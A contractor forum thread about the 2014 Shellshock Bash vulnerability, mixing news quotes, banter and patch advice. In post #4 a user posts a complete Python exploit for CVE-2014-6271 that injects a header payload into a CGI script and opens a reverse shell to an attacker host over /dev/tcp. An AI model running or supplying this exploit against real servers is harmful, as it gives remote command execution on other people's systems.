• Visitors can check out the Forum FAQ by clicking this link. You have to register before you can post: click the REGISTER link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below. View our Forum Privacy Policy.
  • Want to receive the latest contracting news and advice straight to your inbox? Sign up to the ContractorUK newsletter here. Every sign up will also be entered into a draw to WIN £100 Amazon vouchers!

Linux bash vulnerability

Collapse
X
  •  
  • Filter
  • Time
  • Show
Clear All
new posts

    Linux bash vulnerability

    Patch Bash NOW: 'Shell Shock' bug blasts OS X, Linux systems wide open

    Ok so this is a 22 year old exploit. Undetected for 22 years. Which means it's everywhere.

    "Holy cow. There are a lot of .mil and .gov sites that are going to get owned," security expert Kenn White said on Wednesday in reaction to the disclosed flaw.
    Uh huh. And I presume this is good news for Russia and ISIS and anyone else who hates the west.

    Proof-of-concept code for exploiting Bash-using CGI scripts to run code with the same privileges as the web server is already floating around the web. A simple Wget fetch can trigger the bug on a vulnerable system.
    All packaged up and ready to go for ease. How "professional"

    "A lot of wireless routers shell out to ping and traceroute – these are all likely vulnerable."
    Oh joy.

    BBC News - Shellshock: 'Deadly serious' new vulnerability found

    What I particularly "like" is

    Similarly, the responsibility for Bash lies with just one person - Chet Ramey, a developer based at Case Western Reserve University in Ohio.
    Poor sod.

    And ...


    Cybersecurity specialists Rapid7 rated the Bash bug as 10 out of 10 for severity, but "low" on complexity - a relatively easy vulnerability for hackers to capitalise on.
    So the perfect storm then.

    How far reaching?

    Some 500,000 machines worldwide were thought to have been vulnerable to Heartbleed. But early estimates, which experts said were conservative, suggest that Shellshock could hit at least 500 million machines.
    Where there's muck there's brass?

    Heartbleed was a bug related to open source cryptographic software OpenSSL. After the bug became public, major tech firms moved to donate large sums of money to the team responsible for maintaining the software.
    So it would seem.

    Is apple affected?

    Well yes, but again they have far bigger issues on the face of it

    Apple Rebuts Complaints of Bending iPhones - WSJ

    So keep an eye out ...

    For general home users worried about security, Prof Woodward suggested simply keeping an eye on manufacturer websites for updates - particularly for hardware such as broadband routers.
    I think the wider implication is on open source in general. The second problem in as many months.
    Knock first as I might be balancing my chakras.

    #2
    Originally posted by suityou01 View Post
    Patch Bash NOW: 'Shell Shock' bug blasts OS X, Linux systems wide open

    Ok so this is a 22 year old exploit. Undetected for 22 years. Which means it's everywhere.



    Uh huh. And I presume this is good news for Russia and ISIS and anyone else who hates the west.



    All packaged up and ready to go for ease. How "professional"



    Oh joy.
    It's only an issue if you expose your shell to the internet via http, if you do then you shouldn't be using Linux.

    Comment


      #3
      Originally posted by Unix View Post
      It's only an issue if you expose your shell to the internet via http, if you do then you shouldn't be using Linux.
      Which most routers tend to do.

      I love the way you are taking this so calmly.

      All these experts are wrong and some snotnosed kid on a forum know better.

      This one will run and run.
      Knock first as I might be balancing my chakras.

      Comment


        #4
        Originally posted by suityou01 View Post

        All packaged up and ready to go for ease. How "professional"
        Just for you, now go find a system which lets you get to a bash shell:

        Code:
        #
        #CVE-2014-6271 cgi-bin reverse shell
        #
        
        import httplib,urllib,sys
        
        if (len(sys.argv)<4):
        	print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
        	print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
        	exit(0)
        
        conn = httplib.HTTPConnection(sys.argv[1])
        reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
        
        headers = {"Content-type": "application/x-www-form-urlencoded",
        	"test":reverse_shell }
        conn.request("GET",sys.argv[2],headers=headers)
        res = conn.getresponse()
        print res.status, res.reason
        data = res.read()
        print data
        Brexit is having a wee in the middle of the room at a house party because nobody is talking to you, and then complaining about the smell.

        Comment


          #5
          Any running apache will do

          It puts Apache web servers, in particular, at risk of compromise: CGI scripts that use or invoke Bash in any way – including any child processes spawned by the scripts – are vulnerable to remote-code injection.
          HTH bissssssssssdi.
          Knock first as I might be balancing my chakras.

          Comment


            #6
            Stop pissing about & get on with your resume.
            What happens in General, stays in General.
            You know what they say about assumptions!

            Comment


              #7
              Originally posted by MarillionFan View Post
              Stop pissing about & get on with your resume.
              Yes boss.
              Knock first as I might be balancing my chakras.

              Comment


                #8
                Originally posted by suityou01 View Post
                Any running apache will do



                HTH bissssssssssdi.
                If you are running CGI which access the shell and If the shell is bash and if your bash has the vulnerability even then it will not be running as root probably as www user which has very limited privileges. I checked my bash and it doesn't have the issue.

                Comment


                  #9
                  Originally posted by Unix View Post
                  If you are running CGI which access the shell and If the shell is bash and if your bash has the vulnerability even then it will not be running as root probably as www user which has very limited privileges. I checked my bash and it doesn't have the issue.
                  First attacks using 'shellshock' Bash bug discovered | ZDNet

                  this thing is clearly wormable, and can easily worm past firewalls and infect lots of systems. One key question is whether Mac OS X and iPhone DHCP service is vulnerable — once the worm gets behind a firewall and runs a hostile DHCP server, that would "game over" for large networks."
                  Knock first as I might be balancing my chakras.

                  Comment


                    #10
                    There is a patch for it so just a matter of updating your bash via your package manager job done.

                    HTH

                    Comment

                    Working...
                    X